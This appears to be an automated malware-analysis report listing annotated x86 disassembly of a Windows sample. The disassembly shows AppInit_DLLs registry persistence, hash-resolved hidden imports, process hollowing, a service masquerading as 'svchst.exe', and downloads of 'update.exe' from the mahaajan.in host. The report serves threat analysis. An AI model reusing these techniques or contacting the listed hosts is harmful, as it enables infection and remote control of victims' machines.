0041470D add esp, 10h
00414710 lea ecx, dword ptr [ebp-00000108h]
00414716 push ecx
00414717 call 004137E0h
0041471C neg eax
0041471E sbb eax, eax
00414720 add eax, 01h
00414723 cmp eax, FFFFFFFFh
00414726 je 00414768h
00414728 push 00000000h
0041472A push 00000004h
0041472C push 00000001h
00414730 push 00000000h Count = 2
00414732 push 40000000h
00414737 lea edx, dword ptr [ebp-00000108h]
0041473D push edx
0041473E call 00413F90h
00414743 mov dword ptr [ebp-00000114h], eax
00414749 push 00000000h
0041474B lea eax, dword ptr [ebp-00000110h]
00414751 push eax
00414752 push 00010600h
00414757 push 00401320h
0041475C mov ecx, dword ptr [ebp-00000114h]
00414762 push ecx
00414763 call 00413FF0h
00414768 mov dword ptr [ebp-0000010Ch], 00000000h xrefs 00414726
00414772 push 00000000h
00414774 lea edx, dword ptr [ebp-0000010Ch]
0041477A push edx
0041477B push 00000000h
0041477D push 000F003Fh
00414786 push 00000000h Count = 3
00414788 push 00411C30h ASCII "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\"
0041478D push 80000002h
00414792 call 00414A30h
00414797 lea eax, dword ptr [ebp-00000108h]
0041479D push eax
0041479E call 00415EDCh
004147A3 add esp, 04h
004147A6 push eax
004147A7 lea ecx, dword ptr [ebp-00000108h]
004147AD push ecx
004147AE push 00000001h
004147B0 push 00000000h
004147B2 push 00411C68h ASCII "AppInit_DLLs"
004147B7 mov edx, dword ptr [ebp-0000010Ch]
004147BD push edx
004147BE call 00414A70h
004147C3 mov eax, dword ptr [ebp-0000010Ch]
004147C9 push eax
004147CA call 00413790h
004147CF mov esp, ebp
004147D1 pop ebp
004147D2 ret function end
Function 004162EC, API count: 1, instr count: 5
APIs
  • HeapFree.KERNEL32, ref: 004162F8
Address Instruction Meta Information
004162EC push dword ptr [esp+04h] xrefs 00416242, 004160FD
004162F0 push 00000000h
004162F2 push dword ptr [00418CE0h]
004162F8 call dword ptr [00401008h] HeapFree@KERNEL32.DLL (Import)
004162FE ret function end
Function 00414A30, API count: 1, instr count: 26
APIs
    • SwitchToThread.KERNEL32, ref: 00415E55
  • RegCreateKeyExA.ADVAPI32, ref: 00414A66
Address Instruction Meta Information
00414A30 push ebp xrefs 00414792
00414A31 mov ebp, esp
00414A33 mov eax, dword ptr [ebp+28h]
00414A36 push eax
00414A37 mov ecx, dword ptr [ebp+24h]
00414A3A push ecx
00414A3B mov edx, dword ptr [ebp+20h]
00414A3E push edx
00414A3F mov eax, dword ptr [ebp+1Ch]
00414A42 push eax
00414A43 mov ecx, dword ptr [ebp+18h]
00414A46 push ecx
00414A47 mov edx, dword ptr [ebp+14h]
00414A4A push edx
00414A4B mov eax, dword ptr [ebp+10h]
00414A4E push eax
00414A4F mov ecx, dword ptr [ebp+0Ch]
00414A52 push ecx
00414A53 mov edx, dword ptr [ebp+08h]
00414A56 push edx
00414A57 push 647832FCh
00414A5C push 90A097E6h
00414A61 call 00415E40h
00414A66 call eax RegCreateKeyExA@ADVAPI32.DLL (Hidden Import)
00414A68 pop ebp
00414A69 retn 0024h function end
Function 00414DC0, API count: 2, instr count: 134
APIs
    • WSAStartup.WS2_32, ref: 00414BB5
    • WSASocketA.WS2_32, ref: 00414BC7
    • WSACleanup.WS2_32, ref: 00414BDC
    • gethostbyname.WS2_32, ref: 00414BEE
    • WSACleanup.WS2_32, ref: 00414C03
    • htons.WS2_32, ref: 00414C10
    • inet_ntoa.WS2_32, ref: 00414C37
    • inet_addr.WS2_32, ref: 00414C3E
    • WSAConnect.WS2_32, ref: 00414C62
    • WSACleanup.WS2_32, ref: 00414C6D
  • send.WS2_32, ref: 00414E28
  • recv.WS2_32, ref: 00414E50
Strings
  • http://mahaajan.in/dd/, va: 00401118
  • %s %s, va: 00411BCC
  • http://%s%sdata/update.exe, va: 00411BD4
Address Instruction Meta Information
00414DC0 push ebp
00414DC1 mov ebp, esp
00414DC3 mov eax, 00001728h
00414DC8 call 004163B4h
00414DCD call 00414C90h
00414DD2 mov dword ptr [ebp-04h], eax
00414DD5 push 00000400h
00414DDA push 00000000h
00414DDC lea eax, dword ptr [ebp-00000408h]
00414DE2 push eax
00414DE3 call 00415F8Fh
00414DE8 add esp, 0Ch
00414DEB push 00401118h ASCII "http://mahaajan.in/dd/"
00414DF0 call 00414BA0h
00414DF5 add esp, 04h
00414DF8 mov dword ptr [ebp-00000410h], eax
00414DFE cmp dword ptr [ebp-00000410h], FFFFFFFFh
00414E05 jne 00414E0Eh
00414E07 xor eax, eax
00414E09 jmp 00414FD8h
00414E0E push 00000000h xrefs 00414E05
00414E10 mov ecx, dword ptr [ebp-04h]
00414E13 push ecx
00414E14 call 00415EDCh
00414E19 add esp, 04h
00414E1C push eax
00414E1D mov edx, dword ptr [ebp-04h]
00414E20 push edx
00414E21 mov eax, dword ptr [ebp-00000410h]
00414E27 push eax
00414E28 call dword ptr [00401064h] send@WS2_32.DLL (Import)
00414E2E push 00000000h xrefs 00414EFC
00414E30 push 00000001h
00414E32 lea ecx, dword ptr [ebp-00000408h]
00414E38 push ecx
00414E39 call 00415EDCh
00414E3E add esp, 04h
00414E41 lea edx, dword ptr [ebp+eax-00000408h]
00414E48 push edx
00414E49 mov eax, dword ptr [ebp-00000410h]
00414E4F push eax
00414E50 call dword ptr [0040105Ch] recv@WS2_32.DLL (Import)
00414E56 mov dword ptr [ebp-00000614h], eax
00414E5C cmp dword ptr [ebp-00000614h], 00000000h
00414E63 je 00414F01h
00414E69 mov dword ptr [ebp-00000618h], 00000000h
00414E73 jmp 00414E84h
00414E75 mov ecx, dword ptr [ebp-00000618h] xrefs 00414EF7
00414E7B add ecx, 01h
00414E7E mov dword ptr [ebp-00000618h], ecx
00414E84 mov edx, dword ptr [ebp-00000618h] xrefs 00414E73
00414E8A movsx eax, byte ptr [ebp+edx-00000408h]
00414E92 test eax, eax
00414E94 je 00414EFCh
00414E96 mov ecx, dword ptr [ebp-00000618h]
00414E9C movsx edx, byte ptr [ebp+ecx-00000408h]
00414EA4 cmp edx, 0Dh
00414EA7 jne 00414EF7h
00414EA9 mov eax, dword ptr [ebp-00000618h]
00414EAF movsx ecx, byte ptr [ebp+eax-00000407h]
00414EB7 cmp ecx, 0Ah
00414EBA jne 00414EF7h
00414EBC mov edx, dword ptr [ebp-00000618h]
00414EC2 movsx eax, byte ptr [ebp+edx-00000406h]
00414ECA cmp eax, 0Dh
00414ECD jne 00414EF7h
00414ECF mov ecx, dword ptr [ebp-00000618h]
00414ED5 movsx edx, byte ptr [ebp+ecx-00000405h]
00414EDD cmp edx, 0Ah
00414EE0 jne 00414EF7h
00414EE2 mov eax, dword ptr [ebp-00000618h]
00414EE8 lea ecx, dword ptr [ebp+eax-00000404h]
00414EEF mov dword ptr [ebp-0000040Ch], ecx
00414EF5 jmp 00414EFCh
00414EF7 jmp 00414E75h xrefs 00414EA7, 00414EBA, 00414ECD, 00414EE0
00414EFC jmp 00414E2Eh xrefs 00414E94, 00414EF5
00414F01 push 00411BC4h xrefs 00414E63
00414F06 mov edx, dword ptr [ebp-0000040Ch]
00414F0C push edx
00414F0D call 00416027h
00414F12 add esp, 08h
00414F15 mov dword ptr [ebp-00000610h], eax
00414F1B mov dword ptr [ebp-0000161Ch], 00000001h
00414F25 jmp 00414F36h
00414F27 mov eax, dword ptr [ebp-0000161Ch] xrefs 00414F5B
00414F2D add eax, 01h
00414F30 mov dword ptr [ebp-0000161Ch], eax
00414F36 cmp dword ptr [ebp-0000161Ch], 04h xrefs 00414F25
00414F3D jnc 00414F5Dh
00414F3F push 00411BC8h
00414F44 push 00000000h
00414F46 call 00416027h
00414F4B add esp, 08h
00414F4E mov ecx, dword ptr [ebp-0000161Ch]
00414F54 mov dword ptr [ebp+ecx*4-00000610h], eax
00414F5B jmp 00414F27h
00414F5D mov edx, dword ptr [ebp-0000060Ch] xrefs 00414F3D
00414F63 push edx
00414F64 mov eax, dword ptr [ebp-00000610h]
00414F6A push eax
00414F6B push 00411BCCh ASCII "%s %s"
00414F70 lea ecx, dword ptr [ebp-00001618h]
00414F76 push ecx
00414F77 call 004141C0h
00414F7C add esp, 10h
00414F7F lea edx, dword ptr [ebp-00001618h]
00414F85 push edx
00414F86 call 00414CC0h
00414F8B add esp, 04h
00414F8E movzx eax, al
00414F91 test eax, eax
00414F93 jne 00414FD6h
00414F95 push 00401118h ASCII "http://mahaajan.in/dd/"
00414F9A push 00411BD4h ASCII "http://%s%sdata/update.exe"
00414F9F lea ecx, dword ptr [ebp-00001728h]
00414FA5 push ecx
00414FA6 call 004141C0h
00414FAB add esp, 0Ch
00414FB0 push 00000000h Count = 2
00414FB2 lea edx, dword ptr [ebp-00001728h]
00414FB8 push edx
00414FB9 push 00000000h
00414FBB call 00415030h
00414FC0 lea eax, dword ptr [ebp-00001728h]
00414FC6 push eax
00414FC7 call 00415120h
00414FCC add esp, 04h
00414FCF push 00000000h
00414FD1 call 00414AA0h
00414FD6 xor eax, eax xrefs 00414F93
00414FD8 mov esp, ebp xrefs 00414E09
00414FDA pop ebp
00414FDB retn 0004h function end
Function 004160F5, API count: 1, instr count: 19
APIs
    • HeapFree.KERNEL32, ref: 004162F8
  • CloseHandle.KERNEL32, ref: 0041610D
Address Instruction Meta Information
004160F5 mov eax, dword ptr [esp+04h] xrefs 004155D9, 00415496
004160F9 push esi
004160FA mov esi, dword ptr [eax]
004160FC push eax
004160FD call 004162ECh
00416102 cmp esi, FFFFFFFFh
00416105 pop ecx
00416106 jne 0041610Ch
00416108 xor eax, eax
0041610A pop esi
0041610B ret function end
0041610C push esi xrefs 00416106
0041610D call dword ptr [00401004h] CloseHandle@KERNEL32.DLL (Import)
00416113 neg eax
00416115 sbb eax, eax
00416117 neg eax
00416119 dec eax
0041611A pop esi
0041611B ret function end
Function 00415760, API count: 1, instr count: 157
APIs
  • LoadLibraryA.KERNEL32, ref: 004158E6
Address Instruction Meta Information
00415760 push ebp xrefs 00415D37, 00415925, 00415E2B
00415761 mov ebp, esp
00415763 sub esp, 00000130h
00415769 mov eax, dword ptr [ebp+08h]
0041576C mov ecx, dword ptr [eax+3Ch]
0041576F mov edx, dword ptr [ebp+08h]
00415772 lea eax, dword ptr [edx+ecx+18h]
00415776 mov dword ptr [ebp-14h], eax
00415779 mov ecx, dword ptr [ebp-14h]
0041577C mov edx, dword ptr [ebp+08h]
0041577F add edx, dword ptr [ecx+60h]
00415782 mov dword ptr [ebp-10h], edx
00415785 mov dword ptr [ebp-08h], 00000000h
0041578C cmp dword ptr [ebp+10h], 00000000h
00415790 je 004157E5h
00415792 mov eax, dword ptr [ebp+10h]
00415795 movsx ecx, byte ptr [eax]
00415798 cmp ecx, 23h
0041579B jne 004157E5h
0041579D mov edx, dword ptr [ebp+10h] xrefs 004157C9
004157A0 add edx, 01h
004157A3 mov dword ptr [ebp+10h], edx
004157A6 mov eax, dword ptr [ebp+10h]
004157A9 movsx ecx, byte ptr [eax]
004157AC test ecx, ecx
004157AE je 004157CBh
004157B0 mov edx, dword ptr [ebp-08h]
004157B3 imul edx, edx, 0Ah
004157B6 mov dword ptr [ebp-08h], edx
004157B9 mov eax, dword ptr [ebp+10h]
004157BC movsx ecx, byte ptr [eax]
004157BF mov edx, dword ptr [ebp-08h]
004157C2 lea eax, dword ptr [edx+ecx-30h]
004157C6 mov dword ptr [ebp-08h], eax
004157C9 jmp 0041579Dh
004157CB mov ecx, dword ptr [ebp-10h] xrefs 004157AE
004157CE mov edx, dword ptr [ebp-08h]
004157D1 sub edx, dword ptr [ecx+10h]
004157D4 mov dword ptr [ebp-08h], edx
004157D7 mov eax, dword ptr [ebp-10h]
004157DA mov ecx, dword ptr [ebp-08h]
004157DD cmp ecx, dword ptr [eax+14h]
004157E0 jc 004157E3h
004157E2 int3
004157E3 jmp 00415851h xrefs 004157E0
004157E5 mov edx, dword ptr [ebp-10h] xrefs 00415790, 0041579B
004157E8 mov eax, dword ptr [ebp+08h]
004157EB add eax, dword ptr [edx+20h]
004157EE mov dword ptr [ebp-24h], eax
004157F1 mov ecx, dword ptr [ebp-10h]
004157F4 mov edx, dword ptr [ebp+08h]
004157F7 add edx, dword ptr [ecx+24h]
004157FA mov dword ptr [ebp-20h], edx
004157FD mov dword ptr [ebp-1Ch], 00000000h
00415804 jmp 0041580Fh
00415806 mov eax, dword ptr [ebp-1Ch] xrefs 00415843
00415809 add eax, 01h
0041580C mov dword ptr [ebp-1Ch], eax
0041580F mov ecx, dword ptr [ebp-10h] xrefs 00415804
00415812 mov edx, dword ptr [ebp-1Ch]
00415815 cmp edx, dword ptr [ecx+18h]
00415818 jnc 00415845h
0041581A mov eax, dword ptr [ebp-1Ch]
0041581D mov ecx, dword ptr [ebp-24h]
00415820 mov edx, dword ptr [ebp+08h]
00415823 add edx, dword ptr [ecx+eax*4]
00415826 push edx
00415827 call 00415710h
0041582C add esp, 04h
0041582F cmp eax, dword ptr [ebp+0Ch]
00415832 jne 00415843h
00415834 mov eax, dword ptr [ebp-1Ch]
00415837 mov ecx, dword ptr [ebp-20h]
0041583A movzx edx, word ptr [ecx+eax*2]
0041583E mov dword ptr [ebp-08h], edx
00415841 jmp 00415845h
00415843 jmp 00415806h xrefs 00415832
00415845 mov eax, dword ptr [ebp-10h] xrefs 00415818, 00415841
00415848 mov ecx, dword ptr [ebp-1Ch]
0041584B cmp ecx, dword ptr [eax+18h]
0041584E jne 00415851h
00415850 int3
00415851 mov edx, dword ptr [ebp-10h] xrefs 0041584E, 004157E3
00415854 mov eax, dword ptr [ebp+08h]
00415857 add eax, dword ptr [edx+1Ch]
0041585A mov dword ptr [ebp-18h], eax
0041585D mov ecx, dword ptr [ebp-08h]
00415860 mov edx, dword ptr [ebp-18h]
00415863 mov eax, dword ptr [ebp+08h]
00415866 add eax, dword ptr [edx+ecx*4]
00415869 mov dword ptr [ebp-0Ch], eax
0041586C mov ecx, dword ptr [ebp-0Ch]
0041586F cmp ecx, dword ptr [ebp+08h]
00415872 jne 00415875h
00415874 int3
00415875 mov edx, dword ptr [ebp-14h] xrefs 00415872
00415878 mov eax, dword ptr [edx+64h]
0041587B mov dword ptr [ebp-04h], eax
0041587E mov ecx, dword ptr [ebp-0Ch]
00415881 cmp ecx, dword ptr [ebp-10h]
00415884 jc 0041592Fh
0041588A mov edx, dword ptr [ebp-10h]
0041588D add edx, dword ptr [ebp-04h]
00415890 cmp dword ptr [ebp-0Ch], edx
00415893 jnc 0041592Fh
00415899 mov eax, dword ptr [ebp-0Ch]
0041589C mov dword ptr [ebp+10h], eax
0041589F mov dword ptr [ebp-28h], 00000000h
004158A6 mov ecx, dword ptr [ebp+10h] xrefs 004158D2
004158A9 movsx edx, byte ptr [ecx]
004158AC cmp edx, 2Eh
004158AF je 004158D4h
004158B1 mov eax, dword ptr [ebp-28h]
004158B4 mov ecx, dword ptr [ebp+10h]
004158B7 mov dl, byte ptr [ecx]
004158B9 mov byte ptr [ebp+eax-00000130h], dl
004158C0 mov eax, dword ptr [ebp-28h]
004158C3 add eax, 01h
004158C6 mov dword ptr [ebp-28h], eax
004158C9 mov ecx, dword ptr [ebp+10h]
004158CC add ecx, 01h
004158CF mov dword ptr [ebp+10h], ecx
004158D2 jmp 004158A6h
004158D4 mov edx, dword ptr [ebp-28h] xrefs 004158AF
004158D7 mov byte ptr [ebp+edx-00000130h], 00000000h
004158DF lea eax, dword ptr [ebp-00000130h]
004158E5 push eax
004158E6 call dword ptr [00418C44h] LoadLibraryA@KERNEL32.DLL (Hidden Import)
004158EC mov dword ptr [ebp+08h], eax
004158EF cmp dword ptr [ebp+08h], 00000000h
004158F3 jne 004158F6h
004158F5 int3
004158F6 mov ecx, dword ptr [ebp+10h] xrefs 004158F3
004158F9 add ecx, 01h
004158FC mov dword ptr [ebp+10h], ecx
004158FF mov edx, dword ptr [ebp+10h]
00415902 movsx eax, byte ptr [edx]
00415905 cmp eax, 23h
00415908 je 00415919h
0041590A mov ecx, dword ptr [ebp+10h]
0041590D push ecx
0041590E call 00415710h
00415913 add esp, 04h
00415916 mov dword ptr [ebp+0Ch], eax
00415919 mov edx, dword ptr [ebp+10h] xrefs 00415908
0041591C push edx
0041591D mov eax, dword ptr [ebp+0Ch]
00415920 push eax
00415921 mov ecx, dword ptr [ebp+08h]
00415924 push ecx
00415925 call 00415760h
0041592A add esp, 0Ch
0041592D jmp 00415932h
0041592F mov eax, dword ptr [ebp-0Ch] xrefs 00415884, 00415893
00415932 mov esp, ebp xrefs 0041592D
00415934 pop ebp
00415935 ret function end
Function 00414290, API count: 1, instr count: 135
APIs
    • CreateProcessA.KERNEL32, ref: 004144EA
    • VirtualAllocEx.KERNEL32, ref: 00414516
    • WriteProcessMemory.KERNEL32, ref: 00414546
    • SetThreadContext.KERNEL32, ref: 0041456A
    • ResumeThread.KERNEL32, ref: 00414586
  • NtUnmapViewOfSection.NTDLL, ref: 0041430D
Address Instruction Meta Information
00414290 push ebp xrefs 004149BA
00414291 mov ebp, esp
00414293 sub esp, 00000348h
00414299 lea eax, dword ptr [ebp-00000340h]
0041429F push eax
004142A0 call 00414430h
004142A5 push eax
004142A6 call 00414450h
004142AB lea ecx, dword ptr [ebp-58h]
004142AE push ecx
004142AF call 00414470h
004142B4 mov edx, dword ptr [ebp+0Ch]
004142B7 mov dword ptr [ebp-68h], edx
004142BA mov eax, dword ptr [ebp-68h]
004142BD mov dword ptr [ebp-00000344h], eax
004142C3 mov ecx, dword ptr [ebp-00000344h]
004142C9 mov edx, dword ptr [ebp-68h]
004142CC add edx, dword ptr [ecx+3Ch]
004142CF mov dword ptr [ebp-64h], edx
004142D2 mov eax, dword ptr [ebp-64h]
004142D5 mov ecx, dword ptr [eax+34h]
004142D8 mov dword ptr [ebp-5Ch], ecx
004142DB mov edx, dword ptr [ebp-64h]
004142DE mov eax, dword ptr [edx+28h]
004142E1 mov dword ptr [ebp-6Ch], eax
004142E4 lea ecx, dword ptr [ebp-10h]
004142E7 push ecx
004142E8 lea edx, dword ptr [ebp-58h]
004142EB push edx
004142EE push 00000000h Count = 2
004142F0 push 00000024h
004142F6 push 00000000h Count = 3
004142F8 call 00414490h
004142FD push eax
004142FE push 00000000h
00414300 call 004144B0h
00414305 mov eax, dword ptr [ebp-5Ch]
00414308 push eax
00414309 mov ecx, dword ptr [ebp-10h]
0041430C push ecx
0041430D call dword ptr [00401070h] NtUnmapViewOfSection@NTDLL.DLL (Import)
00414313 push 00000004h
00414315 push 00003000h
0041431A mov edx, dword ptr [ebp-64h]
0041431D mov eax, dword ptr [edx+50h]
00414320 push eax
00414321 mov ecx, dword ptr [ebp-5Ch]
00414324 push ecx
00414325 mov edx, dword ptr [ebp-10h]
00414328 push edx
00414329 call 004144F0h
0041432E push 00000000h
00414330 mov eax, dword ptr [ebp-64h]
00414333 mov ecx, dword ptr [eax+54h]
00414336 push ecx
00414337 mov edx, dword ptr [ebp-68h]
0041433A push edx
0041433B mov eax, dword ptr [ebp-5Ch]
0041433E push eax
0041433F mov ecx, dword ptr [ebp-10h]
00414342 push ecx
00414343 call 00414520h
00414348 mov dword ptr [ebp-00000348h], 00000000h
00414352 jmp 00414363h
00414354 mov edx, dword ptr [ebp-00000348h] xrefs 004143B9
0041435A add edx, 01h
0041435D mov dword ptr [ebp-00000348h], edx
00414363 mov eax, dword ptr [ebp-64h] xrefs 00414352
00414366 movzx ecx, word ptr [eax+06h]
0041436A cmp dword ptr [ebp-00000348h], ecx
00414370 jnl 004143BBh
00414372 mov edx, dword ptr [ebp-00000344h]
00414378 mov eax, dword ptr [edx+3Ch]
0041437B mov ecx, dword ptr [ebp-68h]
0041437E lea edx, dword ptr [ecx+eax+000000F8h]
00414385 mov eax, dword ptr [ebp-00000348h]
0041438B imul eax, eax, 28h
0041438E add edx, eax
00414390 mov dword ptr [ebp-60h], edx
00414393 push 00000000h
00414395 mov ecx, dword ptr [ebp-60h]
00414398 mov edx, dword ptr [ecx+10h]
0041439B push edx
0041439C mov eax, dword ptr [ebp-60h]
0041439F mov ecx, dword ptr [ebp-68h]
004143A2 add ecx, dword ptr [eax+14h]
004143A5 push ecx
004143A6 mov edx, dword ptr [ebp-60h]
004143A9 mov eax, dword ptr [ebp-5Ch]
004143AC add eax, dword ptr [edx+0Ch]
004143AF push eax
004143B0 mov ecx, dword ptr [ebp-10h]
004143B3 push ecx
004143B4 call 00414520h
004143B9 jmp 00414354h
004143BB mov dword ptr [ebp-00000340h], 00010002h xrefs 00414370
004143C5 lea edx, dword ptr [ebp-00000340h]
004143CB push edx
004143CC mov eax, dword ptr [ebp-0Ch]
004143CF push eax
004143D0 call 00414450h
004143D5 push 00000000h
004143D7 push 00000004h
004143D9 lea ecx, dword ptr [ebp-5Ch]
004143DC push ecx
004143DD mov edx, dword ptr [ebp-0000029Ch]
004143E3 add edx, 08h
004143E6 push edx
004143E7 mov eax, dword ptr [ebp-10h]
004143EA push eax
004143EB call 00414520h
004143F0 mov ecx, dword ptr [ebp-5Ch]
004143F3 add ecx, dword ptr [ebp-6Ch]
004143F6 mov dword ptr [ebp-00000290h], ecx
004143FC lea edx, dword ptr [ebp-00000340h]
00414402 push edx
00414403 mov eax, dword ptr [ebp-0Ch]
00414406 push eax
00414407 call 00414550h
0041440C mov ecx, dword ptr [ebp-0Ch]
0041440F push ecx
00414410 call 00414570h
00414415 mov edx, dword ptr [ebp-68h]
00414418 push edx
00414419 call 00413F70h
0041441E push FFFFFFFFh
00414420 mov eax, dword ptr [ebp-10h]
00414423 push eax
00414424 call 00414590h
00414429 mov esp, ebp
0041442B pop ebp
0041442C ret function end
Function 00415FF2, API count: 1, instr count: 5
APIs
  • HeapAlloc.KERNEL32, ref: 00415FFE
Address Instruction Meta Information
00415FF2 push dword ptr [esp+04h] xrefs 004145B9, 0041624E
00415FF6 push 00000000h
00415FF8 push dword ptr [00418CE0h]
00415FFE call dword ptr [00401000h] HeapAlloc@KERNEL32.DLL (Import)
00416004 ret function end
Function 004161F3, API count: 1, instr count: 7
APIs
  • GetProcessHeap.KERNEL32, ref: 004161F3
Address Instruction Meta Information
004161F3 call dword ptr [00401018h] GetProcessHeap@KERNEL32.DLL (Import)
004161F9 xor ecx, ecx
004161FB test eax, eax
004161FD sete cl
00416200 mov dword ptr [00418CE0h], eax
00416205 mov eax, ecx
00416207 ret function end
Function 004145F0, API count: 0, instr count: 22
Address Instruction Meta Information
004145F0 push ebp xrefs 00414675
004145F1 mov ebp, esp
004145F3 push ecx
004145F4 mov eax, dword ptr [ebp+0Ch]
004145F7 push eax
004145F8 call 004145B0h
004145FD add esp, 04h
00414600 mov dword ptr [ebp-04h], eax
00414603 mov ecx, dword ptr [ebp+08h]
00414606 push ecx
00414607 mov edx, dword ptr [ebp-04h]
0041460A push edx
0041460B call 00416005h
00414610 add esp, 08h
00414613 push 00000004h
00414615 push 00000000h
00414617 mov eax, dword ptr [ebp-04h]
0041461A push eax
0041461B call 00414A00h
00414620 mov esp, ebp
00414622 pop ebp
00414623 ret function end
Function 00414200, API count: 1, instr count: 10
APIs
    • SwitchToThread.KERNEL32, ref: 00415E55
  • FindClose.KERNEL32, ref: 00414216
Address Instruction Meta Information
00414200 push ebp xrefs 00413EC5
00414201 mov ebp, esp
00414203 mov eax, dword ptr [ebp+08h]
00414206 push eax
00414207 push 6B5366BEh
0041420C push 7B4842C1h
00414211 call 00415E40h
00414216 call eax FindClose@KERNEL32.DLL (Hidden Import)
00414218 pop ebp
00414219 retn 0004h function end

Analysis Process: svchst.exe PID: 1616 Parent PID: 1508

Executed Functions
Function 00413B90, API count: 5, instr count: 114
APIs
  • getaddrinfo.WS2_32, ref: 00413BEF
  • getaddrinfo.WS2_32, ref: 00413C32
  • getaddrinfo.WS2_32, ref: 00413C6B
  • getaddrinfo.WS2_32, ref: 00413C8E
  • FreeAddrInfoW.WS2_32, ref: 00413CCD
Strings
  • 0.0.0.0, va: 00413CF0
  • ::0, va: 00413D00
  • 127.0.0.1, va: 00413D0C
  • ::1, va: 00413D20
Address Instruction Meta Information
00413B90 push ebp xrefs 00413EC7, 00413EF5
00413B91 mov ebp, esp
00413B93 add esp, FFFFFFD8h
00413B96 push ebx
00413B97 push esi
00413B98 push edi
00413B99 mov esi, ecx
00413B9B lea edi, dword ptr [ebp-28h]
00413B9E mov ecx, 00000008h
00413BA3 rep movsd
00413BA5 mov edi, edx
00413BA7 mov ebx, eax
00413BA9 mov esi, dword ptr [ebp+08h]
00413BAC xor eax, eax
00413BAE mov dword ptr [ebp-08h], eax
00413BB1 xor eax, eax
00413BB3 push ebp
00413BB4 push 00413CD4h
00413BB9 push dword ptr fs:[eax]
00413BBC mov dword ptr fs:[eax], esp
00413BBF mov eax, esi
00413BC1 xor ecx, ecx
00413BC3 mov edx, 0000001Ch
00413BC8 call 00403030h
00413BCD cmp dword ptr [ebp-20h], 03h
00413BD1 jne 00413BFDh
00413BD3 xor eax, eax
00413BD5 mov dword ptr [ebp-20h], eax
00413BD8 xor eax, eax
00413BDA mov dword ptr [ebp-1Ch], eax
00413BDD lea eax, dword ptr [ebp-08h]
00413BE0 push eax
00413BE1 lea eax, dword ptr [ebp-28h]
00413BE4 push eax
00413BE5 push 00000000h
00413BE7 mov eax, ebx
00413BE9 call 00404878h
00413BEE push eax
00413BEF call dword ptr [0042B44Ch] getaddrinfo@WS2_32.DLL (Hidden Import)
00413BF5 mov dword ptr [ebp-04h], eax
00413BF8 jmp 00413C97h
00413BFD mov eax, ebx xrefs 00413BD1
00413BFF mov edx, 00413CF0h ASCII "0.0.0.0"
00413C04 call 004047C4h
00413C09 je 00413C19h
00413C0B mov eax, ebx
00413C0D mov edx, 00413D00h ASCII "::0"
00413C12 call 004047C4h
00413C17 jne 00413C3Dh
00413C19 mov dword ptr [ebp-28h], 00000001h xrefs 00413C09
00413C20 lea eax, dword ptr [ebp-08h]
00413C23 push eax
00413C24 lea eax, dword ptr [ebp-28h]
00413C27 push eax
00413C28 mov eax, edi
00413C2A call 00404878h
00413C2F push eax
00413C30 push 00000000h
00413C32 call dword ptr [0042B44Ch] getaddrinfo@WS2_32.DLL (Hidden Import)
00413C38 mov dword ptr [ebp-04h], eax
00413C3B jmp 00413C97h
00413C3D mov eax, ebx xrefs 00413C17
00413C3F mov edx, 00413D0Ch ASCII "127.0.0.1"
00413C44 call 004047C4h
00413C49 je 00413C59h
00413C4B mov eax, ebx
00413C4D mov edx, 00413D20h ASCII "::1"
00413C52 call 004047C4h
00413C57 jne 00413C76h
00413C59 lea eax, dword ptr [ebp-08h] xrefs 00413C49
00413C5C push eax
00413C5D lea eax, dword ptr [ebp-28h]
00413C60 push eax
00413C61 mov eax, edi
00413C63 call 00404878h
00413C68 push eax
00413C69 push 00000000h
00413C6B call dword ptr [0042B44Ch] getaddrinfo@WS2_32.DLL (Hidden Import)
00413C71 mov dword ptr [ebp-04h], eax
00413C74 jmp 00413C97h
00413C76 lea eax, dword ptr [ebp-08h] xrefs 00413C57
00413C79 push eax
00413C7A lea eax, dword ptr [ebp-28h]
00413C7D push eax
00413C7E mov eax, edi
00413C80 call 00404878h
00413C85 push eax
00413C86 mov eax, ebx
00413C88 call 00404878h
00413C8D push eax
00413C8E call dword ptr [0042B44Ch] getaddrinfo@WS2_32.DLL (Hidden Import)
00413C94 mov dword ptr [ebp-04h], eax
00413C97 cmp dword ptr [ebp-04h], 00000000h xrefs 00413C3B, 00413C74, 00413BF8
00413C9B jne 00413CB6h
00413C9D cmp dword ptr [ebp-08h], 00000000h
00413CA1 je 00413CB6h
00413CA3 mov eax, dword ptr [ebp-08h]
00413CA6 mov ecx, dword ptr [eax+10h]
00413CA9 mov edx, esi
00413CAB mov eax, dword ptr [ebp-08h]
00413CAE mov eax, dword ptr [eax+18h]
00413CB1 call 00402890h
00413CB6 xor eax, eax xrefs 00413C9B, 00413CA1
00413CB8 pop edx
00413CBA pop ecx Count = 2
00413CBB mov dword ptr fs:[eax], edx
00413CBE push 00413CDBh
00413CC3 cmp dword ptr [ebp-08h], 00000000h xrefs 00413CD9
00413CC7 je 00413CD3h
00413CC9 mov eax, dword ptr [ebp-08h]
00413CCC push eax
00413CCD call dword ptr [0042B450h] FreeAddrInfoW@WS2_32.DLL (Hidden Import)
00413CD3 ret xrefs 00413CC7 function end
Function 00429D88, API count: 2, instr count: 107
APIs
    • GetModuleHandleA.KERNEL32, ref: 00406044
    • QueryPerformanceCounter.KERNEL32, ref: 00402A20
    • GetTickCount.KERNEL32, ref: 00402A34
    • SHGetSpecialFolderPathA.SHELL32, ref: 00421CEF
    • GetCommandLineA.KERNEL32, ref: 004029F2
    • OpenSCManagerA.ADVAPI32, ref: 00429AC4
    • CreateServiceA.ADVAPI32, ref: 00429AF5
    • CloseServiceHandle.ADVAPI32, ref: 00429AFD
    • OpenServiceA.ADVAPI32, ref: 00429B39
    • StartServiceA.ADVAPI32, ref: 00429B4D
    • QueryServiceStatus.ADVAPI32, ref: 00429B5C
  • CopyFileA.KERNEL32, ref: 00429EBB
  • StartServiceCtrlDispatcherA.ADVAPI32, ref: 00429F02
Strings
  • Host Generic Process, va: 00429F38
  • Host Generic Process for Win32 Services, va: 00429F74
  • \svchst.exe, va: 00429FB0
  • http://mahaajan.in/dd/diwar.php, va: 0042A000
Address Instruction Meta Information
00429D88 push ebp
00429D89 mov ebp, esp
00429D8B mov ecx, 00000005h
00429D92 push 00000000h Count = 2
00429D94 dec ecx
00429D95 jne 00429D90h
00429D97 push ecx
00429D98 push ebx
00429D99 mov eax, 00429CC0h
00429D9E call 00406038h
00429DA3 xor eax, eax
00429DA5 push ebp
00429DA6 push 00429F22h
00429DAB push dword ptr fs:[eax]
00429DAE mov dword ptr fs:[eax], esp
00429DB1 call 00402A1Ch
00429DB6 mov eax, 0042DA9Ch
